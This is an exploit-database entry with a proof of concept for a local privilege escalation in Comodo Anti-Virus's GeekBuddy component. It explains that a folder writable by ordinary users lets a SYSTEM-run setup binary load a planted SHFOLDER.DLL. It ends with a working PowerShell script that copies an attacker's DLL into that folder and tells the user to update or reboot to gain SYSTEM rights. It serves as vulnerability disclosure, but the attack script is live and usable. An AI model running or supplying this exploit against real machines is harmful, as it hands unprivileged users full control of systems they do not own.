Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit

2016-02-29T00:00:00
ID 1337DAY-ID-25531
Type zdt
Reporter Laughing_Mantis
Modified 2016-02-29T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
 
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
 
###Technical Geeky Stuff###
 
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
 
The directory listing is as follows:
10/06/2015  12:08 AM    <DIR>          .
10/06/2015  12:08 AM    <DIR>          ..
10/02/2015  10:43 PM                27 download.cfg
10/02/2015  10:47 PM           637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015  10:44 PM         2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015  10:44 PM           547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015  12:07 AM         1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015  10:44 PM           554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015  12:06 AM           950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015  12:08 AM           563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015  10:43 PM           768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015  12:08 AM           581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015  10:47 PM           459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015  10:46 PM         1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015  12:07 AM         1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015  12:07 AM           648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015  10:43 PM                 1 survey_version.txt
10/06/2015  12:05 AM    <DIR>          updates
 
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
 
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                BUILTIN\Administrators:(OI)(CI)(ID)F
                                CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                BUILTIN\Users:(OI)(CI)(ID)R
                                BUILTIN\Users:(CI)(ID)(special access:)
                                                      FILE_WRITE_DATA
                                                      FILE_APPEND_DATA
                                                      FILE_WRITE_EA
                                                      FILE_WRITE_ATTRIBUTES
 
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access.  This allows 
non-administrator users the ability to create files in the directory but not delete or modify 
existing files.
 
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder.  This service is auto launched by the 
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
 
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM 
level privielges.  This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe 
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
 
During client connections to update servers and Geek Buddy executions the unit.exe binary will 
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe.  This setup binary has 
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is 
executed from.
 
.data:00409240                 dd offset aShfolder     ; "SHFOLDER"
.data:00409244                 dd offset aShgetfolderpat ; "SHGetFolderPathA"
 
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before 
looking in the other PATHS variables.
 
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an 
update or client connection to secure servers (which occurs automatically at user login) a user can 
elevate their privileges to SYSTEM and compromise the system fully.
 
 
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
 
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times.  C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do.  #Ninja
Sizzop - for fixing my greetz
 
#########################################################################################################
 
 
#>
 
Param
(
 
    [Parameter(ValueFromPipelineByPropertyName = $true)]
    [string]$DLL = ""
)
 
 
 
 
if (!(Test-Path $DLL))
{
    throw "Fatal Error: The specified file: $DLL does not exist."  
}
 
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
 
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
 
 
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
 
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon 
 
 
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info" 
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges" 
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
  
$objNotifyIcon.Visible = $True 
$objNotifyIcon.ShowBalloonTip(8000)

#  0day.today [2018-03-06]  #